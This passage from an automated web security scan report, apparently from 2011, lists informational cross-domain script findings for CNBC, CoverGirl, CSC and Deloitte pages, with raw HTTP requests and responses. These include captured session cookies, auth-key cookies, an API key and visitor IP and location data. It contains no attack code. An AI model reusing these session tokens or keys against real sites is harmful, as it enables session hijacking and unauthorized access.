http://cdn.gigya.com/JS/socialize.js?apikey=2_Jx5rsFp18pauXYlKGzHQVpbahcR1iJ30bbyfqZsn69A6vbt3dQ7gYFCESWKMM1sP
http://js.adsonar.com/js/adsonar.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US
http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcBpSz0sIifbhEQkGsO3tDc1WB3hEycGiKfIKA9zI8x%2fY%3d; path=/
Set-Cookie: cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7FI8/GrL59R8o=; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 14:57:32 GMT
Via: 1.1 C aicache6
Content-Length: 184638
X-Aicache-OS: 207.46.150.45:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Tue, 06 Sep 2011 14:57:38 GMT

<html class="cnbc_html"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content="View the ...CNBC US Television... section & see the full online T
...[SNIP]...
</script>

<script type="text/javascript" lang="javascript" src="http://cdn.gigya.com/JS/socialize.js?apikey=2_Jx5rsFp18pauXYlKGzHQVpbahcR1iJ30bbyfqZsn69A6vbt3dQ7gYFCESWKMM1sP"></script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc"><script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<br><script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
</script><script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

20.83. http://www.cnbc.com/id/15838394 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cnbc.com
Path:	/id/15838394

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.gigya.com/JS/socialize.js?apikey=2_Jx5rsFp18pauXYlKGzHQVpbahcR1iJ30bbyfqZsn69A6vbt3dQ7gYFCESWKMM1sP
http://js.adsonar.com/js/adsonar.js
http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zc%2fY5ELdAENHOFxpoh%2bgPqkAQHkPk0lP1hvqCaED0yuYg%3d; path=/
Set-Cookie: cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7Fcf9Uq9kjbM8=; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 14:58:00 GMT
Via: 1.1 C aicache6
Content-Length: 132851
X-Aicache-OS: 65.55.53.237:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Tue, 06 Sep 2011 14:58:07 GMT

<html class="cnbc_html"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content=""The Call" is a full hour of analysis, discussion and debat
...[SNIP]...
</script>

<script type="text/javascript" lang="javascript" src="http://cdn.gigya.com/JS/socialize.js?apikey=2_Jx5rsFp18pauXYlKGzHQVpbahcR1iJ30bbyfqZsn69A6vbt3dQ7gYFCESWKMM1sP"></script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc"><script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

20.84. http://www.cnbc.com/id/15839263/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cnbc.com
Path:	/id/15839263/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.gigya.com/JS/socialize.js?apikey=2_Jx5rsFp18pauXYlKGzHQVpbahcR1iJ30bbyfqZsn69A6vbt3dQ7gYFCESWKMM1sP
http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /id/15839263/ HTTP/1.1
Host: www.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcEF4XUi6XQh5KDbh%2ft9s8vR9Dq3E7N%2f0PZHYpJjzP7Ec%3d; path=/
Set-Cookie: cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7FWozWH53xFGc=; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:06:40 GMT
Via: 1.1 C aicache6
Content-Length: 103803
X-Aicache-OS: 65.55.53.237:80
Connection: close
Keep-Alive: max=20
Expires: Tue, 06 Sep 2011 15:06:47 GMT

<html class="cnbc_html"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content="View our CNBC video gallery and find video news clips on the stock ma
...[SNIP]...
</script>

<script type="text/javascript" lang="javascript" src="http://cdn.gigya.com/JS/socialize.js?apikey=2_Jx5rsFp18pauXYlKGzHQVpbahcR1iJ30bbyfqZsn69A6vbt3dQ7gYFCESWKMM1sP"></script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc"><script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</script><script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

20.85. http://www.cnbc.com/pointrollads.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cnbc.com
Path:	/pointrollads.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.gigya.com/JS/socialize.js?apikey=2_Jx5rsFp18pauXYlKGzHQVpbahcR1iJ30bbyfqZsn69A6vbt3dQ7gYFCESWKMM1sP
http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /pointrollads.htm HTTP/1.1
Host: www.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcEF4XUi6XQh5KDbh%2ft9s8vdxuU1kQdgmk3WPEusCCQGY%3d; path=/
Set-Cookie: cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7F0G3LU09Tixk=; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:06:42 GMT
Via: 1.1 aicache6
Content-Length: 95136
X-Aicache-OS: 65.55.53.237:80
Connection: close

<html class="cnbc_html" xmlns:tvservices="http://www.msnbc.com"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta http-equiv="pics-label" content="(pics-1.1 "http://w
...[SNIP]...
</script>

<script type="text/javascript" lang="javascript" src="http://cdn.gigya.com/JS/socialize.js?apikey=2_Jx5rsFp18pauXYlKGzHQVpbahcR1iJ30bbyfqZsn69A6vbt3dQ7gYFCESWKMM1sP"></script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc"><script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</script><script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

20.86. http://www.covergirl.com/__utm.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.covergirl.com
Path:	/__utm.gif

Issue detail

The response dynamically includes the following script from another domain:

https://js.revsci.net/gateway/gw.js?csid=F09828

Request

Response

20.87. http://www.covergirl.com/beauty-products previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.covergirl.com
Path:	/beauty-products

Issue detail

The response dynamically includes the following script from another domain:

https://js.revsci.net/gateway/gw.js?csid=F09828

Request

Response

20.88. http://www.covergirl.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.covergirl.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

https://js.revsci.net/gateway/gw.js?csid=F09828

Request

GET /favicon.ico HTTP/1.1
Host: www.covergirl.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=kmi5afnggj2ugc45ntt0nzzx; sifrFetch=true; __utma=214218501.640054455.1315345533.1315345533.1315345533.2; __utmb=214218501.1.10.1315345533; __utmc=214218501; __utmz=214218501.1315345533.2.2.utmcsr=google|utmccn=CG%20Evergreen%20GKW%20-%201011%20-%20BMM|utmcmd=cpc|utmctr=%20beauty%20%20products|utmcct=s9xEppg8V|7750439198

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:38 GMT
Server: Microsoft-IIS/6.0
X-Server: EW58
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 62298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en-us">
...[SNIP]...
</script>

<script type="text/javascript" src="https://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

20.89. http://www.covergirl.com/search/results=makeup%20eyelash previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.covergirl.com
Path:	/search/results=makeup%20eyelash

Issue detail

The response dynamically includes the following script from another domain:

https://js.revsci.net/gateway/gw.js?csid=F09828

Request

GET /search/results=makeup%20eyelash HTTP/1.1
Host: www.covergirl.com
Proxy-Connection: keep-alive
Referer: http://www.covergirl.com/search/results=xss%20help%20phone%20cable
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=kmi5afnggj2ugc45ntt0nzzx; sifrFetch=true; __utma=214218501.640054455.1315345533.1315345533.1315345533.2; __utmb=214218501.2.10.1315345533; __utmc=214218501; __utmz=214218501.1315345533.2.2.utmcsr=google|utmccn=CG%20Evergreen%20GKW%20-%201011%20-%20BMM|utmcmd=cpc|utmctr=%20beauty%20%20products|utmcct=s9xEppg8V|7750439198

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:46:20 GMT
Server: Microsoft-IIS/6.0
X-Server: EW58
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en-us">
...[SNIP]...
</script>

<script type="text/javascript" src="https://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

20.90. http://www.covergirl.com/search/results=xss%20help%20phone%20cable previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.covergirl.com
Path:	/search/results=xss%20help%20phone%20cable

Issue detail

The response dynamically includes the following script from another domain:

https://js.revsci.net/gateway/gw.js?csid=F09828

Request

GET /search/results=xss%20help%20phone%20cable HTTP/1.1
Host: www.covergirl.com
Proxy-Connection: keep-alive
Referer: http://www.covergirl.com/beauty-products?utm_source=google&utm_medium=cpc&utm_term=%2Bbeauty%20%2Bproducts&utm_campaign=CG+Evergreen+GKW+-+1011+-+BMM&utm_content=s9xEppg8V|7750439198
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=kmi5afnggj2ugc45ntt0nzzx; sifrFetch=true; __utma=214218501.640054455.1315345533.1315345533.1315345533.2; __utmb=214218501.1.10.1315345533; __utmc=214218501; __utmz=214218501.1315345533.2.2.utmcsr=google|utmccn=CG%20Evergreen%20GKW%20-%201011%20-%20BMM|utmcmd=cpc|utmctr=%20beauty%20%20products|utmcct=s9xEppg8V|7750439198

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:46:08 GMT
Server: Microsoft-IIS/6.0
X-Server: EW58
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44418

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en-us">
...[SNIP]...
</script>

<script type="text/javascript" src="https://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

20.91. http://www.csc.com/application_services/contact_us previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.csc.com
Path:	/application_services/contact_us

Issue detail

The response dynamically includes the following scripts from other domains:

http://rd.clickshift.com/js/convert.js
http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /application_services/contact_us HTTP/1.1
Host: www.csc.com
Proxy-Connection: keep-alive
Referer: http://www.csc.com/contact_us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.CSC.Com_HTTP-9000_Pool=1150396288.10275.0000; s_vi=[CS]v1|2733217B8516386C-600001A40000394C[CE]; visitor_info=country%3DUS%26region%3DTX%26city%3DDallas%26latitude%3D32.7825012207031%26longitude%3D-96.8207015991211%26domain%3Dsoftlayer.com%26organization%3DSoftLayer%2BTechnologies%26ip%3D50.23.123.106%26language%3Den-US%26http_user_agent%3DMozilla%252F5.0%2B%2528Windows%2BNT%2B6.1%253B%2BWOW64%2529%2BAppleWebKit%252F535.1%2B%2528KHTML%252C%2Blike%2BGecko%2529%2BChrome%252F13.0.782.220%2BSafari%252F535.1; _session=BAh7BjoPc2Vzc2lvbl9pZCIlZDQ3ZTkwZTY4MTZhNjllNmJiMTU4ZWFkOTk1N2NlYjU%3D--7d3a5af62ef35b69f0a33d9e8e51b9af33cdc6a0; visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26content_id%3D29513%26internal_search%3Dxss%26traffic_source%3Ddirect%2Cdirect%2Creferral%26zone_id%3D509%26content_type_id%3D13%26visits%3D1; subexpandable=-1c; s_sess=%20ev4%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=253059739.694282920.1315342663.1315342663.1315342663.1; __utmb=253059739.5.10.1315342663; __utmc=253059739; __utmz=253059739.1315342663.1.1.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; IPE_S_26841=26841

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:09:21 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 16:09:20 GMT
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 16:09:21 GMT
Vary: Accept-Encoding
Content-Length: 9442
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</script>
<SCRIPT type="text/javascript" src="//rd.clickshift.com/js/convert.js"></SCRIPT>
...[SNIP]...

20.92. http://www.csc.com/contact_us previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.csc.com
Path:	/contact_us

Issue detail

The response dynamically includes the following script from another domain:

http://rd.clickshift.com/js/convert.js

Request

GET /contact_us HTTP/1.1
Host: www.csc.com
Proxy-Connection: keep-alive
Referer: http://www.csc.com/services
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.CSC.Com_HTTP-9000_Pool=1150396288.10275.0000; s_vi=[CS]v1|2733217B8516386C-600001A40000394C[CE]; visitor_info=country%3DUS%26region%3DTX%26city%3DDallas%26latitude%3D32.7825012207031%26longitude%3D-96.8207015991211%26domain%3Dsoftlayer.com%26organization%3DSoftLayer%2BTechnologies%26ip%3D50.23.123.106%26language%3Den-US%26http_user_agent%3DMozilla%252F5.0%2B%2528Windows%2BNT%2B6.1%253B%2BWOW64%2529%2BAppleWebKit%252F535.1%2B%2528KHTML%252C%2Blike%2BGecko%2529%2BChrome%252F13.0.782.220%2BSafari%252F535.1; _session=BAh7BjoPc2Vzc2lvbl9pZCIlZDQ3ZTkwZTY4MTZhNjllNmJiMTU4ZWFkOTk1N2NlYjU%3D--7d3a5af62ef35b69f0a33d9e8e51b9af33cdc6a0; visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26content_id%3D29513%26internal_search%3Dxss%26traffic_source%3Ddirect%2Cdirect%2Creferral%26zone_id%3D509%26content_type_id%3D13%26visits%3D1; subexpandable=-1c; __utma=253059739.694282920.1315342663.1315342663.1315342663.1; __utmb=253059739.3.10.1315342663; __utmc=253059739; __utmz=253059739.1315342663.1.1.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; IPE_S_26841=26841; s_sess=%20ev4%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dcsccom%253D%252526pid%25253DServices%2525253AHome%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.csc.com/contact_us%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:09:11 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 16:01:52 GMT
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 16:09:11 GMT
Vary: Accept-Encoding
Content-Length: 14011
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
</script>
<SCRIPT type="text/javascript" src="//rd.clickshift.com/js/convert.js"></SCRIPT>
...[SNIP]...

20.93. http://www.csc.com/credit_services/contact_us/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.csc.com
Path:	/credit_services/contact_us/

Issue detail

The response dynamically includes the following scripts from other domains:

http://rd.clickshift.com/js/convert.js
http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /credit_services/contact_us/ HTTP/1.1
Host: www.csc.com
Proxy-Connection: keep-alive
Referer: http://www.csc.com/contact_us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.CSC.Com_HTTP-9000_Pool=1150396288.10275.0000; s_vi=[CS]v1|2733217B8516386C-600001A40000394C[CE]; visitor_info=country%3DUS%26region%3DTX%26city%3DDallas%26latitude%3D32.7825012207031%26longitude%3D-96.8207015991211%26domain%3Dsoftlayer.com%26organization%3DSoftLayer%2BTechnologies%26ip%3D50.23.123.106%26language%3Den-US%26http_user_agent%3DMozilla%252F5.0%2B%2528Windows%2BNT%2B6.1%253B%2BWOW64%2529%2BAppleWebKit%252F535.1%2B%2528KHTML%252C%2Blike%2BGecko%2529%2BChrome%252F13.0.782.220%2BSafari%252F535.1; subexpandable=-1c; visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26internal_search%3Dxss%26content_id%3D29513%26zone_id%3D509%26traffic_source%3Ddirect%2Cdirect%2Cdirect%2Creferral%26content_type_id%3D13%26visits%3D1; s_sess=%20ev4%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=253059739.694282920.1315342663.1315342663.1315342663.1; __utmb=253059739.6.10.1315342663; __utmc=253059739; __utmz=253059739.1315342663.1.1.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; IPE_S_26841=26841; _session=BAh7BjoPc2Vzc2lvbl9pZCIlZDQ3ZTkwZTY4MTZhNjllNmJiMTU4ZWFkOTk1N2NlYjU%3D--7d3a5af62ef35b69f0a33d9e8e51b9af33cdc6a0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:09:24 GMT
ETag: "4e6645b3-2079-52cbe9"
Last-Modified: Tue, 06 Sep 2011 16:09:23 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 16:09:24 GMT
Vary: Accept-Encoding
Content-Length: 8313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</script>
<SCRIPT type="text/javascript" src="//rd.clickshift.com/js/convert.js"></SCRIPT>
...[SNIP]...

20.94. http://www.csc.com/cybersecurity/contact_us previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.csc.com
Path:	/cybersecurity/contact_us

Issue detail

The response dynamically includes the following scripts from other domains:

http://rd.clickshift.com/js/convert.js
http://s7.addthis.com/js/250/addthis_widget.js

Request

Response

20.95. http://www.deloitte.com/view/en_US/us/Contact-us/email-us/index.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.deloitte.com
Path:	/view/en_US/us/Contact-us/email-us/index.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://secure.quantserve.com/quant.js
https://ips-invite.iperceptions.com/webValidator.aspx?sdfc=225de72b-25001-dc122be4-e6ff-4f0b-866a-51f79b5e757f&lID=1&loc=4Q-WEB2&cD=90&rF=False&iType=1&domainname=0

Request

GET /view/en_US/us/Contact-us/email-us/index.htm HTTP/1.1
Host: www.deloitte.com
Proxy-Connection: keep-alive
Referer: http://www.deloitte.com/view/en_US/us/Contact-us/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-928200600-1315342618637; s_vi=[CS]v1|27332165051D18B6-4000013520016CC4[CE]; BIGipServerwww64.deloitte.com=50851850.36895.0000; s_vnum=1747342618651%26vn%3D2; JSESSIONID=WGW1TmPf5K1hhvSxmVygzvtch6pn6HsRCtV116TYKr7FcvQTJkvN!-755750050; SITESERVER=ID=0120f21d112bdebcef542549eb84e28a; __utma=55230644.1519156675.1315342619.1315342619.1315345938.2; __utmb=55230644.16.10.1315345938; __utmc=55230644; __utmz=55230644.1315345938.2.2.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; s_cc=true; s_ppv=86; SC_LINKS=us%3Acontact%5E%5Eemail%20form%5E%5Eus%3Acontact%20%7C%20email%20form%5E%5E; s_nr=1315345973568-Repeat; s_invisit=true; s_ppg=us%3Acontact; s_sq=deloittecomnewplatformprod%3D%2526pid%253Dus%25253Acontact%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.deloitte.com%25252Fview%25252Fen_US%25252Fus%25252FContact-us%25252Femail-us%25252Findex.htm_2%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

20.96. http://www.deloitte.com/view/en_US/us/Contact-us/index.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.deloitte.com
Path:	/view/en_US/us/Contact-us/index.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://secure.quantserve.com/quant.js
https://ips-invite.iperceptions.com/webValidator.aspx?sdfc=225de72b-25001-dc122be4-e6ff-4f0b-866a-51f79b5e757f&lID=1&loc=4Q-WEB2&cD=90&rF=False&iType=1&domainname=0

Request

GET /view/en_US/us/Contact-us/index.htm HTTP/1.1
Host: www.deloitte.com
Proxy-Connection: keep-alive
Referer: http://www.deloitte.com/view/en_US/us/Industries/Telecom-Telecommunications-Technology/a1a6da8d60fd4210VgnVCM200000bb42f00aRCRD.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-928200600-1315342618637; s_vi=[CS]v1|27332165051D18B6-4000013520016CC4[CE]; BIGipServerwww64.deloitte.com=50851850.36895.0000; s_vnum=1747342618651%26vn%3D2; JSESSIONID=WGW1TmPf5K1hhvSxmVygzvtch6pn6HsRCtV116TYKr7FcvQTJkvN!-755750050; SITESERVER=ID=0120f21d112bdebcef542549eb84e28a; __utma=55230644.1519156675.1315342619.1315342619.1315345938.2; __utmb=55230644.14.10.1315345938; __utmc=55230644; __utmz=55230644.1315345938.2.2.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; s_cc=true; s_ppv=72; SC_LINKS=us%3Aind%3Atelecom%3Athe%20broadband%20stimulus%20program%3A%20are%20you%20prepared%20to%20explore%20untapped%20opportunities%3F%5E%5EContact%5E%5Eus%3Aind%3Atelecom%3Athe%20broadband%20stimulus%20program%3A%20are%20you%20prepared%20to%20explore%20untapped%20opportunities%3F%20%7C%20Contact%5E%5E; s_nr=1315345969717-Repeat; s_invisit=true; s_ppg=us%3Aind%3Atelecom%3Athe%20broadband%20stimulus%20program%3A%20are%20you%20prepared%20to%20explore%20untapped%20opportunities%3F; s_sq=deloittecomnewplatformprod%3D%2526pid%253Dus%25253Aind%25253Atelecom%25253Athe%252520broadband%252520stimulus%252520program%25253A%252520are%252520you%252520prepared%252520to%252520explore%252520untapped%252520opportunities%25253F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.deloitte.com%25252Fview%25252Fen_US%25252Fus%25252FContact-us%25252Findex.htm_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

20.97. http://www.deloitte.com/view/en_US/us/Industries/Telecom-Telecommunications-Technology/a1a6da8d60fd4210VgnVCM200000bb42f00aRCRD.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.deloitte.com
